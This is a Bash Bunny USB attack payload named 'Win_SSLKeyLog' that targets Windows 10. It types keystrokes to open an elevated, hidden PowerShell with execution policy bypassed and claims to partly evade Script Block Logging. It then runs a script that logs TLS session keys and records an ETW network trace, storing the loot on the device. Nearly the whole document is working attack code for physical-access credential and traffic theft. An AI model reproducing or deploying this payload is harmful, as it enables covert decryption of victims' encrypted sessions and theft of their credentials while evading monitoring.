#!/bin/bash
#
# Title:            Win_SSLKeyLog
#
# Description:      
#                   Captures the client network session.
#                   Captures the client side session keys.
#
#                   1) Partially avoids "PowerShell Script Block Logging".
#                   2) Closing of all windows.
#                   3) Hide "PowerShell" window.
#                   4) Check if current process have "Administrator" privilege.
#                   5) Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information. 
#                   6) Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)".
#                   7) Writes the file system cache to disk (thanks to @dark_pyrro).
#                   8) Safely eject (thanks to @Night (9o3)).
#
# Author:           TW-D
# Version:          1.0
# Category:         Credentials
# Target:           Microsoft Windows 10
# Attackmodes:      HID and STORAGE
#
# TESTED ON
# ===============
# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
#
# REQUIREMENTS
# ===============
# The target user must belong to the 'Administrator' group.
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# Cyan inverted single blink ...................... SPECIAL
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH

######## INITIALIZATION ########

readonly BB_LABEL="BashBunny"
readonly SNIFFING_TIME=300

######## SETUP ########

LED SETUP

ATTACKMODE HID STORAGE
GET SWITCH_POSITION
udisk mount

######## ATTACK ########

LED ATTACK

Q DELAY 5000
Q GUI r
Q DELAY 5000
Q STRING "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
Q DELAY 1500
Q CTRL-SHIFT ENTER
Q DELAY 5000
Q LEFTARROW
Q DELAY 3000
Q ENTER
Q DELAY 7000

LED STAGE2

Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)\""
Q ENTER
Q DELAY 3500

Q STRING "\$BB_SWITCH = \"\${BB_VOLUME}payloads\\${SWITCH_POSITION}\\\""
Q ENTER
Q DELAY 1500

Q STRING "CD \"\${BB_SWITCH}\""
Q ENTER
Q DELAY 1500

LED STAGE3

Q STRING ".\payload.ps1 -BB_VOLUME \"\${BB_VOLUME}\" -SNIFFING_TIME ${SNIFFING_TIME}"
Q ENTER
Q DELAY 1500

LED SPECIAL

until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done

######## CLEANUP ########

LED CLEANUP

rm /root/udisk/loot/done.txt
sync
udisk unmount

######## FINISH ########

LED FINISH

shutdown -h 0